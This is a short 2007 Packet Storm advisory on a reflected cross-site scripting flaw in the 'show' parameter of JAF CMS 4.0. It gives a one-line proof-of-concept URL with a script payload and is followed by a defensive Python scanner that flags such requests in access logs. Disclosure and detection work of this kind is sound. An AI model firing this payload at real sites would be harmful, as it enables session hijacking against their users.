jafcms-xss.txt

2007-05-03T00:00:00
ID PACKETSTORM:56396
Type packetstorm
Reporter Arham Muhammad
Modified 2007-05-03T00:00:00

Description

                                        
`JAF CMS - 4.0 Cross Site Scripting Vulnerability  
  
Source: http://sourceforge.net/projects/jaf-cms/  
  
Author: Arham Muhammad  
  
POC: http://site/path/index.php?show="><script>alert(/xss/);</script>  
  
There Is No Sign Of Filtering In Jaf-Cms, Making It Prone To XSS  
And Session Hijacking!  
`
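
A detection-side check for the reflected `show` parameter described above, as an added example that is not part of the original advisory or the JAF CMS code base: it scans web-server access log lines for `index.php` requests whose `show` value decodes to HTML metacharacters. The combined log format, the sample entries and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Request line of a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Characters that let a reflected value close an attribute or open a tag.
HTML_META = re.compile(r'[<>"\']')

# Constructed sample entries (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/May/2007:10:00:01 +0000] "GET /path/index.php?show=news HTTP/1.1" 200 5120',
    '192.0.2.44 - - [03/May/2007:10:02:17 +0000] "GET /path/index.php?show=%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E HTTP/1.1" 200 5340',
    '192.0.2.44 - - [03/May/2007:10:02:40 +0000] "GET /path/index.php?show=%2522%253E%253Cb%253E HTTP/1.1" 200 5300',
    '192.0.2.71 - - [03/May/2007:10:05:09 +0000] "GET /path/style.css?show=%3Cb%3E HTTP/1.1" 200 812',
]


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is also inspected."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_show_values(log_line):
    """Decoded `show` values of index.php requests that contain HTML metacharacters."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return []
    target = urlsplit(match.group("target"))
    if not target.path.endswith("/index.php"):
        return []
    values = parse_qs(target.query, keep_blank_values=True).get("show", [])
    return [v for v in map(fully_decode, values) if HTML_META.search(v)]


def scan(lines):
    """Return (line_number, value) pairs for every flagged request."""
    return [(n, v) for n, line in enumerate(lines, 1)
            for v in suspicious_show_values(line)]


if __name__ == "__main__":
    for line_no, value in scan(SAMPLE_LOG):
        print(f"line {line_no}: show={value!r}")
```

A hit only shows that markup-breaking input reached the parameter; whether it was reflected unencoded still has to be confirmed against the response or the application code.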